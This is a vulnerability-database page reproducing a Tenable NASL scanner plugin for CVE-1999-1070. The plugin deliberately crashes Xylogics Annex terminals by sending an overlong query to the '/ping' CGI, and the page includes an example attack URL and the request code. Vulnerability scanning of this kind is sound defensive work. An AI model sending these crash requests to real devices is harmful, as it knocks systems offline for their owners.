| Reporter | Title | Published | Views | Family All 4 |
|---|---|---|---|---|
| CVE-1999-1070 | 12 Sep 200104:00 | – | cve | |
| CVE-1999-1070 | 12 Sep 200104:00 | – | cvelist | |
| EUVD-1999-1051 | 7 Oct 202500:30 | – | euvd | |
| CVE-1999-1070 | 25 Jul 199804:00 | – | nvd |
| Source | Link |
|---|---|
| cve | www.cve.mitre.org/cgi-bin/cvename.cgi |
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(10017);
script_version("1.42");
script_set_attribute(attribute:"plugin_modification_date", value:"2025/09/29");
script_cve_id("CVE-1999-1070");
script_name(english:"Xylogics Annex Terminal Service ping CGI Program DoS");
script_summary(english:"Crashes an Annex terminal");
script_set_attribute(attribute:"synopsis", value:"The remote host is vulnerable to a denial of service.");
script_set_attribute(attribute:"description", value:
"It was possible to crash the remote Annex terminal by connecting to
the HTTP port, and requesting the '/ping' CGI script with an argument
that is too long. For example:
http://www.example.com/ping?query=AAAAA(...)AAAAA");
script_set_attribute(attribute:"solution", value:"Remove the '/ping' CGI script from your web server.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C");
script_set_attribute(attribute:"vuln_publication_date", value:"1998/07/25");
script_set_attribute(attribute:"plugin_publication_date", value:"1999/06/22");
script_set_attribute(attribute:"potential_vulnerability", value:"true");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
script_category(ACT_KILL_HOST);
script_copyright(english:"This script is Copyright (C) 1999-2025 Tenable Network Security, Inc.");
script_family(english:"CGI abuses");
script_dependencie("find_service1.nasl", "http_version.nasl", "no404.nasl");
script_require_keys("Settings/ParanoidReport");
script_require_ports("Services/www", 80);
exit(0);
}
include("http.inc");
include("torture_cgi.inc");
if (report_paranoia < 2) audit(AUDIT_PARANOID);
port = get_http_port(default:80);
if (http_is_dead(port: port)) exit(0);
cgi = "/ping";
if (! is_cgi_installed3(item:cgi, port:port)) exit(0);
start_denial();
r = http_send_recv3(port: port, item: strcat(cgi, "?query=", crap(4096)), method: 'GET');
if (http_is_dead(port: port, retry: 3))
{
alive = end_denial();
if(!alive)
{
security_hole(port);
set_kb_item(name:"Host/dead", value:TRUE);
}
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation